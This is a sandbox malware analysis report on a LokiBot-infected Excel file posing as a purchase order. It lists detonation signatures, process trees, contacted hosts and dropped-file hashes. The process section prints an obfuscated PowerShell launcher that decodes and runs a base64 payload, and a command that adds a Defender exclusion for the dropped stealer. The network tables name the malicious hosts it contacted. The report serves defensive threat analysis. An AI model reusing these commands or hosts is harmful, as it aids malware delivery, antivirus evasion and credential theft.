Malware Analysis Report

2025-04-03 09:49

Sample ID 241119-kq3lwasnhx
Target 19112024_0849_18112024_PO-000041492.xls
SHA256 555c9fab8b1c2180ec0c140d7ef7a072d3848661e47051b4dda5de40a61465b7
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

The file 19112024_0849_18112024_PO-000041492.xls was found to be: Known bad.

Malicious Activity Summary

Process spawned unexpected child process

Lokibot family

Lokibot

Blocklisted process makes network request

Evasion via Device Credential Deployment

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

outlook_office_path

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

outlook_win_path

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-19 08:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-19 08:49

Reported

2024-11-19 08:54

Platform

win7-20240903-en

Max time kernel

285s

Max time network

295s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\19112024_0849_18112024_PO-000041492.xls

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1660 set thread context of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2760 wrote to memory of 2568 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2760 wrote to memory of 2568 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2760 wrote to memory of 2568 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2760 wrote to memory of 2568 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2568 wrote to memory of 2276 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2276 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2276 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2276 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 264 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2568 wrote to memory of 264 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2568 wrote to memory of 264 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2568 wrote to memory of 264 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 264 wrote to memory of 2392 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 264 wrote to memory of 2392 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 264 wrote to memory of 2392 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 264 wrote to memory of 2392 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2568 wrote to memory of 1660 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2568 wrote to memory of 1660 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2568 wrote to memory of 1660 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2568 wrote to memory of 1660 | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 444 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 444 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 444 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 444 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\19112024_0849_18112024_PO-000041492.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE

"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'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'+[ChAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fmw0hx7y.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC65C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC64B.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | link.uebie.de | udp
DE | 5.45.108.48:443 | link.uebie.de | tcp
US | 8.8.8.8:53 | e6.o.lencr.org | udp
GB | 88.221.134.89:80 | e6.o.lencr.org | tcp
US | 66.63.187.231:80 | 66.63.187.231 | tcp
DE | 5.45.108.48:443 | link.uebie.de | tcp
US | 66.63.187.231:80 | 66.63.187.231 | tcp
US | 66.63.187.231:80 | 66.63.187.231 | tcp
US | 8.8.8.8:53 | crl.microsoft.com | udp
GB | 88.221.134.83:80 | crl.microsoft.com | tcp
US | 8.8.8.8:53 | www.microsoft.com | udp
US | 23.192.22.93:80 | www.microsoft.com | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp
DE | 94.156.177.41:80 | 94.156.177.41 | tcp

Files

memory/2004-1-0x0000000071F3D000-0x0000000071F48000-memory.dmp

memory/2004-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2760-16-0x0000000000FD0000-0x0000000000FD2000-memory.dmp

memory/2004-17-0x0000000002DE0000-0x0000000002DE2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B083487247EB8FBD76503EF0DA269B6B

MD5 19441ff3417824165292902a45b2b1a0
SHA1 d540476ed095e25dcde39c9fda6377cf8eabdb00
SHA256 76a89a769b67f8f4d4f9c0086311f804fe47473f0f631c67052dc27d4c485eaf
SHA512 98f2849a2ff381580d0a2e3f1cf4800a745fd61ae5a3078c9e6c64332efe30154143705541cacd9cea0099de66775aaf5c89b1c75ce3652257e08ecca692406f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 0a378af2d086b23d27752d0b437d21c5
SHA1 606aa2e0be67c4ef5e913f543c7fd3503b8405bc
SHA256 22ae1cb7c6414df525a67ed498e2356e90d769f06a669477378d7644c7649b30
SHA512 aa3f99a1ed6adb91a8975dbcb9491d858fb04db0d35d582530c31c947072ce6996eeda96222d55320f1a9da9b3019d80f437a07b594217dd6da8f92c446ee1cf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B083487247EB8FBD76503EF0DA269B6B

MD5 21df645ec13368af70d0fdc697fd5359
SHA1 5b82ae15964e432a108cdcaff6577f97a3fa282c
SHA256 ab8079f4c308128ed7c6149a31e451702426eb988972368078d420cb490b0ec2
SHA512 29c1ad99095fb83110e4aa0d34bc6229aba1d15f30aaf5971228d9a03a032dc83d5232e13923b776a67f0419e7eeb5e684cff95b10c9aa2443653779909cc1d0

C:\Users\Admin\AppData\Local\Temp\CabBC2E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor[1].hta

MD5 db21eb9cf86a8314900d693c5a40c4e9
SHA1 1dd5c5e45f4c0224a6c4f4ce443bcb542fc5913c
SHA256 da1ae3eef8260a07b09c7978317fed23be8c431f2620629a9bc3f170df113102
SHA512 b589c6d47dd7dc29d3e8e6823c68966ee388d5e78fbc5b300abd38829443889591efe774564c861349dcad7b1981f9317b60fb1c19a3b232f12c64e403783f2c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 de3896007a0ce7fe6d44eb1ff9929bdb
SHA1 19d77f34ea9f482d9d2361300297614678d5892a
SHA256 2b0baba624c1062db007046379c4594b36fdf0ea94e75cb63e11d30dedb0c13c
SHA512 4375b9ce461f3e482aca91111fb70c844c3fdb83085167fd4b5572c8c9c2e152625c8e76e1c1672accf4f193853310df6a5bb75e77f8f45646fd7f30be6c90d9

\??\c:\Users\Admin\AppData\Local\Temp\fmw0hx7y.cmdline

MD5 813ed3d19f0980c53e9f13189f90d5c8
SHA1 0b930b3827bf97455f21d098223210668fab6a33
SHA256 ce9980bf0841e99e39685df06e4e5d70a4b10c363c5f9ee97e70fc260caa2132
SHA512 34ae88e47482b7c3e2a9cfd91347da3895330a733aab35439c6bf1eeaae29140fe57e5777fc0433adde1297f8b2b79028ea70bc82b056d1617562630dab5633a

\??\c:\Users\Admin\AppData\Local\Temp\fmw0hx7y.0.cs

MD5 f97fc8141f59078b4354b513d3b083ac
SHA1 293904ab8d5f38a2f0764ee2e35e97e590d8c737
SHA256 f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e
SHA512 87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

\??\c:\Users\Admin\AppData\Local\Temp\CSCC64B.tmp

MD5 b87615cee40c4877b9d70368fd1d19eb
SHA1 da5fece3588786c71a0135363c01c33771e78214
SHA256 fd1b4fd86d41992253cb9d3b79b13d46e49c3d819561da0d9e5d8c2f22a3706d
SHA512 1affaaf736ddec655c5fc18fdf42ac7998b575151471e02228840bc93cd81b80ac637b7fe1451964bd852260dba44ec2134b8d14d0fd19ee41fe42330a95e52a

C:\Users\Admin\AppData\Local\Temp\RESC65C.tmp

MD5 cc80a1b90c410b05a64883887d9fbd12
SHA1 23adb91480fd45e77b55193518fbf46eb0ca8d2a
SHA256 52fc88503e68a6084f9d205052dd19199cf26c53e3b9213619ce16cbf0fdd57a
SHA512 b5e3a0964829f7fc012270ac8c15addb56bdb69b03bdf22cf6bd505b2bce360321ad530f606e8c313ff5d8822a433dd48b63fc3241c6fb8585e31a5438ce6669

C:\Users\Admin\AppData\Local\Temp\fmw0hx7y.dll

MD5 77e1e8bb36d4d55c8fa5c7d1f042e9eb
SHA1 9ab6241aca8b3800ec7fc8a501aaf4665734dccf
SHA256 c682a3088d132b66aec3ebd4686b4b3d80851edd01ef2bd17e062a8c074554dd
SHA512 4d9b232c71e127ac0d7e2ab8330230c13725ed1a5f415c2de581911072bf343cd86c4773221727389970f2152a17234dbe5dcc836f39959638188b937085cb64

C:\Users\Admin\AppData\Local\Temp\fmw0hx7y.pdb

MD5 712cb33ce82633f3e103b7a7f6eb71a3
SHA1 78093c425b42c7125cd16809603c766e54fb08d1
SHA256 e1642ca5e9766b52bc9f9b0cef73cab7ccb9241f332eebaf905a7ec80703fba4
SHA512 24caae7bc7240e8a38d3d7a16df5ccf52511f07c60e65ec3f8cc64229ef2eccf39cf00327a42011a2b1d9f0c3fca1fa2e1d2f8d49742016d613e16872513fb47

memory/2004-60-0x0000000071F3D000-0x0000000071F48000-memory.dmp

C:\Users\Admin\AppData\Roaming\caspol.exe

MD5 759dd13715bc424308f1d0032ac4b502
SHA1 03347c96c50c140192e8df70260d732bea301ebc
SHA256 d4c86776bcf1dc4ffd2f51538f3e342216314b76cdba2c2864193350654a9aca
SHA512 4197992f4b44ea45c91cb00c7308949560ae24d179e9a14ebc4efb27e1b20abae203b1c8756c211eb9aab9732a3fd04c824bd6bc92510c8de3caea3a8cfa8e55

memory/1660-70-0x00000000011A0000-0x0000000001224000-memory.dmp

memory/1660-71-0x0000000000430000-0x0000000000442000-memory.dmp

memory/1660-72-0x00000000008B0000-0x0000000000914000-memory.dmp

memory/1664-73-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-83-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1664-86-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-84-0x0000000000400000-0x00000000004A2000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1664-75-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-81-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-79-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-77-0x0000000000400000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

memory/1664-112-0x0000000000400000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/1664-120-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-19 08:49

Reported

2024-11-19 08:54

Platform

win10v2004-20241007-en

Max time kernel

299s

Max time network

207s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\19112024_0849_18112024_PO-000041492.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2668 wrote to memory of 2168 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe
PID 2668 wrote to memory of 2168 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\19112024_0849_18112024_PO-000041492.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | link.uebie.de | udp
DE | 5.45.108.48:443 | link.uebie.de | tcp
US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 48.108.45.5.in-addr.arpa | udp
US | 8.8.8.8:53 | e6.o.lencr.org | udp
